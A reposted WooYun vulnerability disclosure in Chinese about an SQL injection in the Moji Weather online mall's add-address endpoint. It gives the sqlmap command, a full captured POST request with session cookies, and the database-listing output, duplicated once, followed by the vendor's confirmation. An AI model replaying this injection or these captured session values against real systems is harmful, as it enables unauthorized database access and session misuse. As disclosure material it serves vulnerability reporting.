墨迹天气某处SQL注入

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-25: 细节已通知厂商并且等待厂商处理中
2016-04-27: 厂商已经确认,细节仅向厂商公开
2016-05-07: 细节向核心白帽子及相关领域专家公开
2016-05-17: 细节向普通白帽子公开
2016-05-27: 细节向实习白帽子公开
2016-06-11: 细节向公众公开

简要描述:

RT

详细说明:

 

code 区域
post注入:sqlmap.py -r 1.txt --dbs      
-------------post数据包--------------------
POST /myshop/addnewaddress HTTP/1.1
Host: mall.moji.com
Proxy-Connection: keep-alive
Content-Length: 223
Accept: application/json
Origin: http://mall.moji.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined

username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644



数据库

code 区域
available databases [1]:
[*] mojimall



1.png

 

漏洞证明:

 

code 区域
post注入:sqlmap.py -r 1.txt --dbs     
-------------post数据包--------------------
POST /myshop/addnewaddress HTTP/1.1
Host: mall.moji.com
Proxy-Connection: keep-alive
Content-Length: 223
Accept: application/json
Origin: http://mall.moji.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://mall.moji.com/appmall/addmyaddress/303/0/0//30912644
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: 95c3_f2f1_saltkey=BnP2jU2i; 95c3_f2f1_lastvisit=1461512525; _gat=1; 95c3_f2f1_ulastactivity=007bVQljxo3T7iodgIY6kXKWLQYtnR0mUrYaTjRxDXBEsuc%2F5AWU; 95c3_f2f1_auth=8d28nu8ZL8lUxTNB38jCZtcm814riUpex1CN9Ul0DpNNNq%2BiFUY6NhqEtVTuLmxSjjg911m6O1ZPqz9J5svuEgrfzA; 95c3_f2f1_nofavfid=1; 95c3_f2f1_home_diymode=1; 95c3_f2f1_sid=lcN6TE; 95c3_f2f1_lastact=1461516316%09home.php%09spacecp; 95c3_f2f1_noticeTitle=1; PHPSESSID=tuepaaqgk46jkqsudff50c16r6; channel=default; 303=%7B%22buy_way%22%3A%220%22%2C%22way_id%22%3A%220%22%7D; goods_id=303; sku_total=1; product_size01=%E9%93%B6%E8%89%B2%E9%95%9C%E7%89%87; product_num=1; moji_sessionid=AES6D7177316B516A7A39316874306E4763612F4E4759513D3D; snsid=30912644; good_data_product_no=%5B%22303%22%5D; good_data_name_json=%5B%223M%5Cu62a4%5Cu76ee%5Cu955c1791T%5C%2F1790G%22%5D; product_price_json=%5B%2269.00%22%5D; shop_price_json=%5B%2299.00%22%5D; goods_ids=303; __ads_session=KIROnPAYtgie93EAKwA=; _ga=GA1.2.1391845924.1461516131; _yd_=GA1.3.451698722.1461516330; Hm_lvt_4bd2403ae3a05b9a989b28908b95bef5=1461516331,1461516647; Hm_lpvt_4bd2403ae3a05b9a989b28908b95bef5=1461516652; province=undefined; city=undefined; county=undefined

username=%E9%BB%91%E8%89%B2%E9%94%AE%E7%9B%98&province=%E4%B8%8A%E6%B5%B7%E5%B8%82&city=%E4%B8%8A%E6%B5%B7%E5%B8%82&district=%E5%AE%9D%E5%B1%B1%E5%8C%BA&addressDetail=11111&postcode=111111&mobile=13444455555&userid=30912644



数据库

code 区域
available databases [1]:
[*] mojimall



1.png

 

修复方案:

过滤

版权声明:转载请注明来源 黑色键盘丶@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2016-04-27 15:52

厂商回复:

感谢提醒。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:墨迹天气某处SQL注入 - https://www.15qq.cn/wooyun/987.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知